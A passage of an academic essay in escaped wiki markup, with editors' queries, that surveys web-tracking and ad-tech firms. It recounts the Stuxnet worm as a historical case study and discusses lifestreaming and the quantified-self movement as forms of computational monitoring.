*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a 